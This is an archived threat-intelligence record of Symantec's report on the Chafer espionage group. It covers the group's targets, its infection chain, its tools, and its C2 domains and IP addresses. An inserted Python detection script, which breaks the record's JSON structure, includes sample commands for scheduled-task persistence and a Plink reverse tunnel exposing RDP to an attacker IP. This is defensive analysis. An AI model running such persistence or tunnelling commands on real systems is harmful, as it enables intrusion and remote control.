{
	"id": "b713a8dd-f2d9-41ed-8453-d23f26a02b3e",
	"created_at": "2026-04-06T01:30:25.838485Z",
	"updated_at": "2026-04-10T03:37:36.590448Z",
	"deleted_at": null,
	"sha1_hash": "02e9d44492fa846e30c977197aed811b7ea2177b",
	"title": "Chafer: Latest Attacks Reveal Heightened Ambitions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 58320,
	"plain_text": "Chafer: Latest Attacks Reveal Heightened Ambitions\r\nArchived: 2026-04-06 00:24:48 UTC\r\nChafer, the Iran-based targeted attack group, mounted further operations throughout 2017, attacking more\r\norganizations in the Middle East and beyond, and deploying several new tools. The group staged a number of\r\nambitious new attacks last year, including the compromise of a major telecoms services provider in the region.\r\nThere is also evidence that it attempted to attack a major international travel reservations firm. Chafer appears to\r\nbe primarily engaged in surveillance and tracking of individuals, with most of its attacks likely carried out to\r\ngather information on targets or facilitate surveillance.\r\nChafer has been active since at least July 2014 and its activities were first exposed by Symantec in December\r\n2015, when it was found to be conducting targeted surveillance of domestic and international targets. At the time,\r\nmany of its targets were individuals located in Iran, and it had already begun compromising telecom providers as\r\nwell as airline companies in the Middle East region.\r\nExpansion of operations\r\nChafer appears to have been undeterred by its exposure in 2015 and continued to be very active during 2017,\r\nusing seven new tools, rolling out new infrastructure, and attacking nine new target organizations in the region.\r\nThe group hit organizations in Israel, Jordan, the United Arab Emirates, Saudi Arabia, and Turkey.\r\nSectors targeted included airlines; aircraft services; software and IT services companies serving the air and sea\r\ntransport sectors; telecoms services; payroll services; engineering consultancies; and document management\r\nsoftware.\r\nOutside of the Middle East, Symantec has also found evidence of attacks against one African airline and attempts\r\nto compromise an international travel reservations firm.\r\nAmbitious new targets\r\nOne of the organizations compromised by 
Chafer in 2017 was a telecoms services provider in the Middle East,\r\nwhich sells its solutions to multiple telecoms operators in the region. The ultimate goal of the attack may have\r\nbeen to facilitate surveillance of end-user customers of telecoms operators. By moving two steps up the supply\r\nchain the attackers could potentially have carried out surveillance on a vast pool of end-users.\r\nAlongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company’s\r\nown files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory\r\nalongside a number of hacking tools used by the attackers.\r\nA second target outside the Middle East provides further confirmation of Chafer’s heightened ambitions in recent\r\ntimes. Symantec found evidence that it had tried to compromise a large international travel reservations firm.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions\r\nPage 1 of 5\n\nThere was no indication that the attack was successful, but Chafer did successfully infiltrate an African airline that\r\nis a customer of the reservations firm.\r\nHow Chafer infects targets\r\nIn the earlier attacks from 2015, Symantec found evidence that Chafer had been compromising targeted\r\norganizations by attacking their web servers, likely through SQL injection attacks, in order to drop malware onto\r\nthem. In 2017, the group added a new infection method to its toolkit, using malicious documents which are likely\r\ncirculated using spear-phishing emails sent to individuals working in targeted organizations.\r\nThese documents were Excel spreadsheets. When opened, they downloaded a malicious VBS file that in turn ran a\r\nPowerShell script. Several hours later, a dropper would appear on the compromised computer. 
This would install\r\nthree files on the computer, an information stealer, a screen capture utility, and an empty executable.\r\nThe screen capture utility appeared to be used for initial information gathering, as it was only used briefly at the\r\nbeginning of each infection and not seen again. The information stealer was capable of stealing the contents of the\r\nclipboard, taking screenshots, recording keystrokes and stealing files and user credentials. After this initial\r\nactivity, the attackers usually downloaded more of their tools to the computer using a PowerShell downloader and\r\nbegan moving across the victim’s network.\r\nNew tools used to compromise networks\r\nSymantec has seen Chafer use seven new tools in its more recent campaigns, in addition to malware it is\r\npreviously known to have used. Most of the new tools are freely available, off-the-shelf tools, put to a malicious\r\nuse. The new tools include:\r\nRemcom: An open-source alternative to PsExec, which is a Microsoft Sysinternals tool used for executing\r\nprocesses on other systems.\r\nNon-sucking Service Manager (NSSM): An open-source alternative to the Windows Service Manager\r\nwhich can be used to install and remove services and will restart services if they crash.\r\nA custom screenshot and clipboard capture tool.\r\nSMB hacking tools: Used in conjunction with other tools to traverse target networks. 
These tools include\r\nthe EternalBlue exploit (which was previously used by WannaCry and Petya).\r\nGNU HTTPTunnel: An open-source tool that can create a bidirectional HTTP tunnel on Linux computers,\r\npotentially allowing communication beyond a restrictive firewall.\r\nUltraVNC: An open-source remote administration tool for Microsoft Windows.\r\nNBTScan: A free tool for scanning IP networks for NetBIOS name information.\r\nChafer has also continued to use tools previously associated with the group, including its own custom backdoor\r\nRemexi (Backdoor.Remexi); the aforementioned PsExec; Mimikatz (Hacktool.Mimikatz), a free tool capable of\r\nchanging privileges, exporting security certificates, and recovering Windows passwords in plaintext; Pwdump\r\n(Pwdump), a tool used to grab Windows password hashes from a remote Windows computer; and Plink\r\n(PuTTY Link), a command-line utility used to create reverse SSH sessions.\r\nChafer has used these tools in concert to traverse targeted networks. The group has recently adopted NSSM to\r\nmaintain persistence, installing a service that runs Plink on the compromised computer. Plink then opens a\r\nreverse SSH session to the attacker's server, forwarding a port on that server back to the RDP port on the victim\r\ncomputer, which presumably gives the attackers RDP access to the compromised computer.\r\nOnce a foothold is established, the attackers use PsExec, Remcom, and SMB hacking tools to begin moving\r\nacross the victim’s network.\r\nNew infrastructure in use\r\nChafer has also begun using new infrastructure. The domain win7-updates[.]com is being used by the group as a\r\ncommand and control address. 
The domain has been referenced several times in command lines, e.g.:\r\ns224.win7-update[.]com\r\ns5060.win7-update[.]com\r\ns21.win7-update[.]com\r\nIt has also been embedded in a dropper:\r\nhxxp://wsus65432.win7-update[.]com\r\nSymantec also discovered multiple IP addresses that were used as infrastructure by the attackers. It is unclear\r\nwhether these were leased or hijacked, but the fact that many of them appear to follow a pattern, with the last\r\noctet of several addresses repeating or running in sequence, makes it likely they were deliberately selected by the\r\nattackers.\r\n107.191.62[.]45\r\n94.100.21[.]213\r\n89.38.97[.]112\r\n148.251.197[.]113\r\n83.142.230[.]113\r\n87.117.204[.]113\r\n89.38.97[.]115\r\n87.117.204[.]115\r\n185.22.172[.]40\r\n92.243.95[.]203\r\n91.218.114[.]204\r\n86.105.227[.]224\r\n91.218.114[.]225\r\n134.119.217[.]84\r\nIn one case, Symantec found what appeared to be a staging server used by the attackers. The server belonged to\r\none of the targeted organizations. Copies of many of the tools used by the group were discovered on the server.\r\nThe attackers didn’t even bother hiding their activity and saved items to the desktop, often without renaming\r\nthem.\r\nLinks to Crambus?\r\nChafer’s activities have some links to another group known as Crambus (aka OilRig). Both groups have been\r\nobserved using the same IP address for command and control purposes. In addition to this, both groups have been\r\nseen using a similar infection vector, namely an Excel document which drops a malicious VBS file. Both VBS\r\nfiles reference the same file path, containing the same misspelling:\r\n“schtasks.exe /create/ F /sc minute /mo 2 /tn \"UpdatMachine\" /tr\r\n%LOCALAPPDATA%\\microsoft\\Feed\\Y658123.vbs”\r\nAre the two groups one and the same? 
While this may be a possibility, at present there isn’t enough evidence to\r\nsupport that hypothesis. What is more likely is that the two groups are known to each other and enjoy access to a\r\nshared pool of resources.\r\nGrowing threat to organizations in the Middle East\r\nChafer’s recent activities indicate that the group remains highly active, is continuing to hone its tools and tactics,\r\nand has become more audacious in its choice of targets. Although a regional actor, the group has followed two\r\ntrends seen globally among targeted attack groups. The first is a greater reliance on freely available software tools,\r\nalso known as “living off the land.” By limiting their use of malware, groups such as Chafer hope to be less\r\nconspicuous on a victim’s network and, if discovered, make their attack more difficult to attribute.\r\nThe second trend is towards attacks on the supply chain, compromising organizations with the goal of then\r\nattacking the customers, or even the customers of the customers, of those organizations. These attacks require\r\nmore “steps” to reach their ultimate target, which adds time and risk for the attackers.\r\nHowever, these attacks also leverage trusted channels into the eventual target, e.g. through a trusted supplier,\r\nallowing attackers to potentially circumvent security systems at the organization they ultimately wish to\r\ncompromise. These attacks are riskier but come with a potentially higher reward and, if successful, could give the\r\nattackers access to a vast pool of potential targets.
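The persistence and tunnelling chain described above (a scheduled task launching the VBS stage, NSSM wrapping Plink as a service, Plink opening a reverse SSH session that exposes the victim's RDP port) and the domain and IP list under "New infrastructure in use" are what a defender can actually hunt for. The Python below is an added example written for this page, not code from the Symantec post. It runs over a few constructed process-creation and network events in a made-up host|kind|detail format, matches them against the defanged indicators transcribed from the post, and applies three behavioural rules for the tradecraft described. The host names, the event format, the service name and the exact NSSM/Plink command line are assumptions: the post says only that the service runs Plink and that Plink opens a reverse SSH session to the RDP port, not what the command looked like. The schtasks sample reproduces the task command quoted in the Crambus section.

```python
from dataclasses import dataclass

# Indicators transcribed from the post above, kept in the defanged form it uses.
DEFANGED_DOMAINS = ['win7-update[.]com', 'win7-updates[.]com']
DEFANGED_IPS = [
    '107.191.62[.]45', '94.100.21[.]213', '89.38.97[.]112', '148.251.197[.]113',
    '83.142.230[.]113', '87.117.204[.]113', '89.38.97[.]115', '87.117.204[.]115',
    '185.22.172[.]40', '92.243.95[.]203', '91.218.114[.]204', '86.105.227[.]224',
    '91.218.114[.]225', '134.119.217[.]84',
]


def refang(ioc):
    # Undo the [.] defanging so the value compares against real telemetry.
    return ioc.replace('[.]', '.').lower()


C2_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
C2_IPS = {refang(ip) for ip in DEFANGED_IPS}


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    evidence: str


def findings_for_cmdline(host, cmdline):
    toks = cmdline.lower().split()
    out = []
    if not toks:
        return out
    image = toks[0]
    # Rule 1: the VBS stage persists via schtasks; UpdatMachine is the misspelled task
    # name shared by the Chafer and Crambus VBS files, so it is matched on its own.
    if image.endswith('schtasks.exe') and '/create' in toks:
        if 'updatmachine' in toks or any(t.endswith('.vbs') for t in toks):
            out.append(Finding('schtasks_vbs_task', host, cmdline))
    # Rule 2: NSSM installing a service whose binary is Plink (persistence for the tunnel).
    if image.endswith('nssm.exe') and 'install' in toks and any('plink' in t for t in toks):
        out.append(Finding('nssm_plink_service', host, cmdline))
    # Rule 3: Plink with -R is a remote port forward; if it lands on 3389 it exposes the
    # victim RDP port on the attacker side, which is the behaviour the post describes.
    if any('plink' in t for t in toks) and '-r' in toks:
        idx = toks.index('-r') + 1
        spec = toks[idx] if idx < len(toks) else ''
        rule = 'plink_reverse_rdp' if spec.split(':')[-1] == '3389' else 'plink_reverse_tunnel'
        out.append(Finding(rule, host, cmdline))
    return out


def findings_for_network(host, subkind, value):
    v = value.lower()
    if subkind == 'dns' and any(v == d or v.endswith('.' + d) for d in C2_DOMAINS):
        return [Finding('c2_domain', host, value)]
    if subkind == 'ip' and v.rsplit(':', 1)[0] in C2_IPS:
        return [Finding('c2_ip', host, value)]
    return []


def hunt(events):
    # Assumed event shapes: host|proc|<command line>, host|net|dns|<name>, host|net|ip|<ip:port>.
    found = []
    for line in events:
        host, kind, rest = line.split('|', 2)
        if kind == 'proc':
            found.extend(findings_for_cmdline(host, rest))
        elif kind == 'net':
            subkind, value = rest.split('|', 1)
            found.extend(findings_for_network(host, subkind, value))
    return found


# Constructed sample telemetry (not from the post). The first line is the scheduled-task
# command quoted in the post; the NSSM/Plink line is an assumed shape for that technique.
SAMPLE_EVENTS = [
    r'WS01|proc|schtasks.exe /create /F /sc minute /mo 2 /tn UpdatMachine /tr %LOCALAPPDATA%\microsoft\Feed\Y658123.vbs',
    'WS01|proc|nssm.exe install WinUpdateSvc plink.exe -N -R 3389:127.0.0.1:3389 -P 22 svc@89.38.97.115',
    'WS01|net|ip|89.38.97.115:22',
    'WS02|net|dns|s224.win7-update.com',
    'WS03|proc|schtasks.exe /create /sc daily /tn NightlyBackup /tr backup.exe',
    'WS03|net|ip|8.8.8.8:53',
    'WS04|proc|plink.exe -ssh admin@10.0.0.5',
]

if __name__ == '__main__':
    for f in hunt(SAMPLE_EVENTS):
        print(f.rule, f.host, f.evidence)
```

Against the sample events this produces five findings, all of them on WS01 and WS02: the scheduled task, the NSSM service, the Plink reverse forward to 3389, the connection to 89.38.97.115, and the lookup of s224.win7-update.com. The benign scheduled task, the DNS resolver traffic and the ordinary outbound Plink session are not flagged. The domain rule matches subdomains because the post shows the group using per-victim labels (s224, s5060, s21, wsus65432) under the same parent, and the IP rule ignores the port so that the indicator holds whatever service the attacker put behind it.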
\r\nProtection\r\nSymantec has the following protection in place to protect customers against these attacks:\r\nFile-based protection\r\nBackdoor.Remexi\r\nBackdoor.Remexi.B\r\nHacktool.Mimikatz\r\nPwdump\r\nIPS: network-based protection\r\nSystem Infected: Backdoor.Remexi Activity\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions"
	],
	"report_names": [
		"chafer-latest-attacks-reveal-heightened-ambitions"
	],
	"threat_actors": [
		{
			"id": "62947fad-14d2-40bf-a721-b1fc2fbe5b5d",
			"created_at": "2025-08-07T02:03:24.741594Z",
			"updated_at": "2026-04-10T02:00:03.653394Z",
			"deleted_at": null,
			"main_name": "COBALT HICKMAN",
			"aliases": [
				"APT39",
				"Burgundy Sandstorm",
				"Chafer",
				"ITG07",
				"Remix Kitten"
			],
			"source_name": "Secureworks:COBALT HICKMAN",
			"tools": [
				"MechaFlounder",
				"Mimikatz",
				"Remexi",
				"TREKX"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bee22874-f90e-410b-93f3-a2f9b1c2e695",
			"created_at": "2022-10-25T16:07:23.45097Z",
			"updated_at": "2026-04-10T02:00:04.610108Z",
			"deleted_at": null,
			"main_name": "Chafer",
			"aliases": [
				"APT 39",
				"Burgundy Sandstorm",
				"Cobalt Hickman",
				"G0087",
				"ITG07",
				"Radio Serpens",
				"Remix Kitten",
				"TA454"
			],
			"source_name": "ETDA:Chafer",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Antak",
				"CACHEMONEY",
				"EternalBlue",
				"HTTPTunnel",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MechaFlounder",
				"Metasploit",
				"Mimikatz",
				"NBTscan",
				"NSSM",
				"Non-sucking Service Manager",
				"POWBAT",
				"Plink",
				"PuTTY Link",
				"Rana",
				"Remcom",
				"Remexi",
				"RemoteCommandExecution",
				"SafetyKatz",
				"UltraVNC",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"nbtscan",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34",
				"CHRYSENE",
				"Crambus",
				"EUROPIUM",
				"Hazel Sandstorm",
				"Helix Kitten",
				"ITG13",
				"OilRig",
				"Yellow Maero"
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439025,
	"ts_updated_at": 1775792256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/02e9d44492fa846e30c977197aed811b7ea2177b.pdf",
		"text": "https://archive.orkl.eu/02e9d44492fa846e30c977197aed811b7ea2177b.txt",
		"img": "https://archive.orkl.eu/02e9d44492fa846e30c977197aed811b7ea2177b.jpg"
	}
}